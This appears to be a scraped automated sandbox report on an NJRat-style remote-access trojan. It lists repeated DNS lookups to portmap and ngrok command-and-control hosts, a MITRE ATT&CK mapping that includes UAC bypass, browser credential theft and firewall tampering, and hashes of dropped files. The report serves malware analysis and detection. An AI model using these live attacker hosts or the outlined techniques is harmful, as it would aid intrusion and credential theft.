nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
336 B
2
2

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
168 B
2
1

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
165 B
2
1

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

0.tcp.ngrok.io

dns

RegSvcs.exe

240 B
76 B
4
1

DNS Request

0.tcp.ngrok.io

DNS Request

0.tcp.ngrok.io

DNS Request

0.tcp.ngrok.io

DNS Request

0.tcp.ngrok.io

DNS Response

3.12.57.198
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

375 B
5

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

224 B
306 B
3
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nexusrules.officeapps.live.com

DNS Request

nexusrules.officeapps.live.com

DNS Response

52.111.243.31
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

360 B
165 B
5
1

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

219 B
498 B
3
3

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

219 B
498 B
3
3

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
336 B
2
2

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

291 B
663 B
4
4

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

297 B
669 B
4
4

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

222 B
333 B
3
2

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
336 B
2
2

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
165 B
2
1

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

0.tcp.ngrok.io

dns

RegSvcs.exe

120 B
152 B
2
2

DNS Request

0.tcp.ngrok.io

DNS Request

0.tcp.ngrok.io

DNS Response

3.135.250.11

DNS Response

3.135.250.11
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

219 B
333 B
3
2

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

www.avp.ru

dns

112 B
282 B
2
2

DNS Request

www.avp.ru

DNS Request

www.avp.ru
8.8.8.8:53

www.avp.ru

dns

112 B
282 B
2
2

DNS Request

www.avp.ru

DNS Request

www.avp.ru
8.8.8.8:53

google.com

dns

56 B
72 B
1
1

DNS Request

google.com

DNS Response

142.250.179.238
8.8.8.8:53

google.com

dns

56 B
72 B
1
1

DNS Request

google.com

DNS Response

142.250.179.238
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

222 B
501 B
3
3

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

222 B
333 B
3
2

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

297 B
669 B
4
4

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

222 B
501 B
3
3

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
165 B
2
1

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
168 B
2
1

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

366 B
831 B
5
5

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
168 B
2
1

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
165 B
2
1

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

444 B
666 B
6
4

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
168 B
2
1

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

294 B
666 B
4
4

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
336 B
2
2

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

222 B
501 B
3
3

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

spocs.getpocket.com

dns

213 B
376 B
3
3

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166

DNS Request

contile.services.mozilla.com

DNS Response

34.117.188.166

DNS Request

contile.services.mozilla.com
8.8.8.8:53

firefox-api-proxy.cdn.mozilla.net

dns

279 B
404 B
3
3

DNS Request

firefox-api-proxy.cdn.mozilla.net

DNS Response

34.149.97.1

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

34.149.97.1

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

2600:1901:0:74e4::
34.149.97.1:443

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

https

2.9kB
13.0kB
13
13
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

206 B
250 B
2
2

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

188 B
244 B
2
2

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:c47c::

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:c47c::

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Autoexec.bat

Filesize
151B

MD5
a38cc2b4c079966fe38d443c90395619

SHA1
9b3445a85bf639714e9da05ffe4594514844f779

SHA256
3fa944e0c7892b6b183b5e5f9cf1b02a55c5f477db87b30f0bd6434892984293

SHA512
f7cf71e100667ad702c89c9e0f5f4cb9b35b8341def6706be2760e91b9f181a02753f7c79067e845aa39f18024d2a5bdeca162700740fd20e2c41e1a2745b6ee

Download Submit
C:\Autoexec.bat

Filesize
302B

MD5
3565a089a0f8b2b5afb04ec4379b44dc

SHA1
4075ac633db35b158e4142860a2fd4f331780f9c

SHA256
941689078f2ed21767fd0aa5ad330df33b8a0ac96acccb2020f307558d6087cb

SHA512
112538d7d1af9c02536db20acfc6cea3225341d0f1468ad49ab980a65c74c9111fbf2514776e4e40bd2fbb13d1703dc47cc647b780dc503be99f6fa712c925a5

Download Submit
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\README.HTM

Filesize
33KB

MD5
50b58c481bd0cd188192a953a46b56a8

SHA1
cd0936dc7eec01dace447c71efdacb6e5f3896b9

SHA256
6d57fcbb972815b6e68827cc0cf1b3eab2c244876a340e915db1dc31028e37f6

SHA512
98749ffd2d62dfab01708ca5407222ac0470a400b5c2a20e4b285ba27bc2deee1e15b3da77753ef090bc1c69e058b6fa05c31f3a7fb314b2f84355199512a46d

Download Submit
C:\ProgramData\Hdlharas\dlrarhsiva.exe

Filesize
9.1MB

MD5
64261d5f3b07671f15b7f10f2f78da3f

SHA1
d4f978177394024bb4d0e5b6b972a5f72f830181

SHA256
87f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad

SHA512
3a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a

Download Submit
C:\ProgramData\Hdlharas\mdkhm.zip

Filesize
56KB

MD5
b635f6f767e485c7e17833411d567712

SHA1
5a9cbdca7794aae308c44edfa7a1ff5b155e4aa8

SHA256
6838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e

SHA512
551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af

Download Submit
C:\ProgramData\svchost\Administrator.ico

Filesize
4KB

MD5
26b78f526713d6752546a035b1709b69

SHA1
3751a34dc318fa330e5f3bb78268bdfb5d70b4bc

SHA256
d2ca7b663a3e35af4775e6f02d215179d85b08ace99530601be5592748997eaf

SHA512
29f53d8074e836a26668e2e01b77b2549097938c6c3ad13cd48acf3068634d09b3c5327fd131312b8ad39c2c81736d4b11a8e3e94dd2596e97cef3757110e7cd

Download Submit
C:\ProgramData\svchost\AutoRun.ico

Filesize
4KB

MD5
28d98fecf9351c6a31c9c37a738f7c15

SHA1
c449dee100d5219a28019537472edc6a42a87db2

SHA256
39445a090b7ce086d5efb4ac35add13672fac9bf40eb481b54fa87302a3f45e0

SHA512
f5c2458348347798304393fdb5c77f4f7ed7245c0d4c7594deb0113262828cb8e210e7b48a4aa7c4d2fe1e31201b4e326cd60a6f9d4e3ba1a7fbef322dde0971

Download Submit
C:\ProgramData\svchost\Autoexec.ico

Filesize
4KB

MD5
d70363b5d771ca4106214505637c3816

SHA1
63ab636f4cec3bf7442db036e879885ab222b9f1

SHA256
f1dca638ee7faa2c7121cc5e9c6ebc02e7b70946c51b205e48985fc054661e7c

SHA512
d8199fdb6a4fcc539450146f43d73645950d0f02315c3a4ccf62c528a90403ee137e2c3418b4566488151c32ee1bfced16492479c2744a87c2d6c8e232f9de27

Download Submit
C:\ProgramData\svchost\XjtnxDp.ico

Filesize
1KB

MD5
1e6c4b32205b72a32786ffcf143ffaed

SHA1
7a99df34d2d7d17e2e01272cd084fdae505bc8b0

SHA256
84a41ba1d0f60c4097dd6921ea73781140c40c14a1872d4aa1872046203e6872

SHA512
49ad851721e811be4b360819eaf55b5a1f572c536fcd86692c05533fa62e91efcf218ad60fa54ce5fc5bc476b04dae78c8ce59c22c7c1448980d430e288ab7f7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Filesize
471B

MD5
3800ef9fef580bac3b95642d30b7c143

SHA1
5cb8f564ebd86fde4099e2f81aa340973aa00139

SHA256
82b657fd0b1ab41de338959155e9bae83210901d9f2dadcc93fd550be09c6a8e

SHA512
1fba6902750a629a0e9eed5fd1e53743b5254d6596417c699dddbc0fb005e646ed99dc4a0d52c6cd2f07e91ca9cc1eebfaadcf24e4f52a5463f16e660f12ba09

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Filesize
412B

MD5
34f8408dc69dd50be4183909f9feefcf

SHA1
58cd96c88029a16c096d878b4d203946474bb046

SHA256
138027c9d92a5f2893e8de721bf80bc6c5a4a71730dcae800bf1c6f9ee07953d

SHA512
45d983e60653f377e7c25aed08250143d2e8acd736b9bacf00dffb191eed432e5e05f069aa4a040d7d981bd40b84e45e41c510b124dbd07c818f2c3d87ca9bd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegSvcs.exe.log

Filesize
120B

MD5
50dec1858e13f033e6dca3cbfad5e8de

SHA1
79ae1e9131b0faf215b499d2f7b4c595aa120925

SHA256
14a557e226e3ba8620bb3a70035e1e316f1e9fb5c9e8f74c07110ee90b8d8ae4

SHA512
1bd73338df685a5b57b0546e102ecfdee65800410d6f77845e50456ac70de72929088af19b59647f01cba7a5acfb399c52d9ef2402a9451366586862ef88e7bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e8baaf6c583536c9e6327e9d4fddb4cc

SHA1
0c1436d1a870038a6cb0195704658ef59ef78906

SHA256
7cea1717ca57c727378be31a2046e1b4be05ceaff81e76d45b5b3fb1a0b09507

SHA512
6cdb5d74ebf3c2f398c2032e6047f32b342db6f28f997c9c3df2351e307b316a6d66127a3ba6f0b1a721e5afd50a5578ec9835ea25708fcd49850ec4ba64dd67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b0070dabeaee8f97ad287a1250f71886

SHA1
95c439e5cdfb58e95bea1dc3f21f942fb1bfa3dc

SHA256
9d11bc8996c1a5f729d90777bd3e5b72e54eb30539acceadabe9afc93a71afa6

SHA512
4a536b6686de8e6ef73fd3f5e93dd025546d0b2ea69f914b8f56e157736a4d2aeed3955a334ce24e1960a195314804e728357a56dfcf15c1f5b2a193c0548a2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3dc7ab8e42d45d4c6de78cc7f9d62bef

SHA1
b2ec31df11c32bb3e17a381e95b0173043b2dfc9

SHA256
42a9d31e089026a45353d9f307a649f39954038fd09548398be9a67e6af915a2

SHA512
b77198b202e85e0ac1daee1ba51baea1640c90626f7c23e485a01e98f7a161dd9f49fd665037da09974d0965f0b1d9c72551fd732d5d03f8f0134682c6ec841c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f34c10348bd67e6401da7a82c1a22531

SHA1
11f7289bbe0bb5066352531a10eadbba79abe5a4

SHA256
3c6ab81e55c4754f0a419ba2cb177141cf11fdad44bfcb4dcc68a535dbb5ec63

SHA512
a60345a5bd9b89efc83cd544e24974e7c3dc15070776660be5418bbdb727e672311c348d8cfce47c585dcc23b59ff3d1ac050c1751de8aa37b4b1be3cb020cd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5332d65d7c50eee952b71eda55782f27

SHA1
9039a05b96d6f5fc532a4ddb304ec01aa2fe5879

SHA256
b677f0eeb2f0c049f48cc35d484ead2ba5434a74e4264e64d7f426fe45f2ff0e

SHA512
eeff99092be3b0bcf81e9ba0f2a72d592938ef90952e533f903707d1e0af2138db62a4b491476f499a0909bf52fc7aada7aa832c73aa882d40f488afe5b29b27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3273a6ed-2223-42cc-a539-6641d64a8b8d.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
21KB

MD5
9ea71f2fe3dde95034633a00d23b2d6f

SHA1
545314022ba037fde65e3cabedaca6a78a2e5a8a

SHA256
3f3b6348a9abd5db8c0905c3482577c1dac5b513935267758d95d829c12bc370

SHA512
48b0221220078394e52a6b79a30ed270acdbea13afa8da5643e28e66d78387f134d06e808b7b205062a66270c44c7fa279ed7c9d4de4cb1474129e69c1fabb1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
40034c2b91fc8c81ebb346bcfed0d35a

SHA1
2fec03a39ba79d28c87f1ef28cd315181f815db7

SHA256
2fb806794a5b6d5c56c1932474c3f8861ea1cedc634a59b05885c4dc7aa7377c

SHA512
352e7679a75390651d72aa265c0ed5d638704cca2fdc6c01a4fc91996fcb78f7b31411df215e88254608e9e0414bd07caf287c2b13cbad33aa673eba1fb9d73a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
dde84886a41f51596008974aa133791b

SHA1
d63d0c15b42e49b4896191d3e8c0443638c34778

SHA256
d9a68a48b38cc248bda7715a5f5dbd858bcb7a07e27c316c3c09054fefc69a57

SHA512
9005e0a6f2d0840cd76e4a5230df2da620818d5a591cf0bc6376918d8755b242f115c7c0515716de06a78ce7f8014475abdb022b802e27369b1c757b10da2634

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
b79d487c3ae758b4850df61b503e7a1f

SHA1
07cf30db399fd4e239e087bb7d4e6203424ce3f3

SHA256
bb810a1e6cab7814ee002f0f61115c4b747375c2c71d42f0d33a0f1044bc6ec2

SHA512
7e17ccd3d9453157cb86276cedf38e20a61b4c1938a9f7c3b5140fdbf4134ae25aaf8a0c9003d717dd991a6e70c26ce1fd70f3cc1a4c192b6179f6427daa303d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
c61cbf7743b2b6ed7cdef00c5f24102c

SHA1
184abe8465fc9281423712e7dc4a44f9c099b585

SHA256
0d5a0d3aa7aee26ad0e9526620022a240c6903c9f14e84b518753df146f46eae

SHA512
974395c35cc4d679d4c55ebed0618ef05a339eb6ffd4b2b75620361fb81b5c7c9da00f1d3fc82f49dc320c8069f12b0b481a4f68b2aa8a5663d6beaeb35292c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
e053f75beb46fc834780fd2049bf551a

SHA1
d93c40382ac1b9bcae3f2e611d439d13e165cf19

SHA256
e2a9c1f6dab8e375f9b3e1cbc0ffc6cdeec3d70f5dd2ff8d553eb1301f78c8d1

SHA512
6d9f6e16926416ec8d1c57c7e671cf363ddfd74c0e18bff7340052855a1e584328f26e33e3b06e2dd268c6901dddf6c73b25a5f89e9b0759910514c622e5b8e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
020d4c36ac19bceb979452cca16e9472

SHA1
d6505eb3dd010d7c956d0343de4984f8d31ecc88

SHA256
ed0133c6414f09bfe412f04d1c6aecb36a8b5cedd367e50d53d4edf3203bbcc7

SHA512
5dc6ae3d7ee99c0d09fd0be1ee4a353c20ff45ceb03722693e1aca4a7389947580ff6eeb2d9c0d699d75dbfc8f9d0dffad9d03da72d281cb9de664c3212de868

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
865B

MD5
0f20ae0f657586b886231eb0625c49d7

SHA1
db415c3a17d2e42b5613d90b70b8f206454d3340

SHA256
4e460f9cc0ed17a6570a314df16685d23b561a787505279c5318cb220b18424c

SHA512
1f9601da56cfd0a58a3fdcdd920f5fe528c8c7b819c121ff56567af2a57cb87c3e15c4a188f5b767cec4c3fd3577bc9da5b02059752f9ea58488d54825c49640

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
936B

MD5
c1e3da099d2bbbaffdf48de97b7f76d9

SHA1
8b8755d1ddd8d77f111f979865d8c0bcd96fccb0

SHA256
17fca4726d4b086d7ccf06d2cfa0a8cd5114790f5fc661f1ca54d106eef9d208

SHA512
53b7a789289635a8b58b67a9dcbf10ab8971b098c01e7a5bf89587f9b2d2a3fd3ef50c215450df96e314de4ea23e88f08a22f5063c37e28361a93918063f7373

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
573B

MD5
02f5e1c88301f961744c7369dc071a87

SHA1
847211bb77fe597f4a5d6b7f9f74fcda4cb53365

SHA256
e71374b6c6e395cf1fa975baecc00a0fed76c83bd5d2e54f023302dec38cd474

SHA512
a464d4b3136b6e153e59c1a9ea28d1d74f2594d3c0fd3d352e2dc033093feed13af85cfc91485adbcaf191509553a28aad17156be6a4811be4d3e84e06846ed2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
936B

MD5
fc032d650b26160e71e43cf1ec50e837

SHA1
6bba613de3b0abe0b0f091dd3723b0cc7b02e3d5

SHA256
c78fcc1b11dd2f85489a8eb0584f108d708bddc85fe0d7ec0e737ef18bc3282d

SHA512
4c1b8d8dbed6f47001340c3689125a02f0f18589950dc9b3663096778b16bb6e236970fc966d13b8cf4cb183fae23e53607bd23248a6208ced671f95a4cf5484

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
515eca482892a8f87f4dc55c1b64c30c

SHA1
b80a6b2a7e2924c9e11749fea989d4227e00b244

SHA256
dd0e689cd42bcbc4513c7222f506cf4dbaa6b4c918282d519fd3b900dc62592a

SHA512
b238a45571a38d64b22f00e7a638f36ab0fc25b113bd642c868845c19442edff7f84ce96c77cac7c6d6cc7250ba749f858459b46c59cf9e6410ab738794e82aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
797321daa7fd9977a19e5514188ca22d

SHA1
37b2ae0d6b187d5e57145e259f6ffb6306268ebd

SHA256
4802ea91c25256417a4fdf47c5ff5ececef0201b0f7ba3b2f361dd2713484e7a

SHA512
587e5a2cd51e6808164f5e1168194f96b6725268788b9e3bb9236b97e73c9044ec1a40fe6fefff7f6d99892d5b0e2295b3f3477848c377735d5018bb4dc22937

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
434325e053fceb3914b31a11fa3f9e44

SHA1
2d22c044e5cf6ca58ed19bd3867f93acc4a127cb

SHA256
f15f59604df2fe5854aafd13326b87f2f40e799f493db3c4a8a5b97d4cd5ee62

SHA512
7dbbfcf398c940c92ad954fffca6ef3326699051111dc1445bb83ac16aa4d0d4f3d727ca229960cc56c573703f079f85eef4841152475bd2028ce3998d2ddc3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
e14e811835cc7b104e7bf8224f35a574

SHA1
eb7303c6692f97ce43309097a18a5452bd81c875

SHA256
a60698beb1100540edbd3409e55f45bb431fc7f5026f2fa6934c0432adabeb54

SHA512
18629d9215f9d8e7a7717d8a809dda5032eaba6671e8b7d8c507c3dc622c8925a6e7c444f1541f88362392fd6d8e12f2abacf1d550188a0e44710026f3faea84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
50b059a71caac8fb8dc6965e5cb58a1b

SHA1
5271fe1a64e9646335b328fdecc3edb2e9aa6c68

SHA256
f0ee5caed9f26f0f53a31bf5a83f961b49ab76c0a636e5e1ce23167c69e426d8

SHA512
b842ce72a9da027ea72c1e56713dfed2d2df34abe4080dbb1f3708e4ba8225474724034a7cb873051d3792f4b4d0d6f932b26b83c662c0023ddb71ad0c884078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
be7242fef6777fd81c8aaec6fb73534d

SHA1
dc0c3d223c9224d69ee320e613d0c5b41a71a7ed

SHA256
ad36fcce6e087f31d955e063b6cb2c94916eeb262185bb17e12782068e6aa40d

SHA512
ec669e172860cc3bd9dea355c5d134e7c459ede9527bda29699a61551c46a9bf8fe21286c10651e9f221966d6d90a7273faeefe7802fb94b26ffdbeef823c4f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
383bbde77d31aeffea83edc62c50ac9a

SHA1
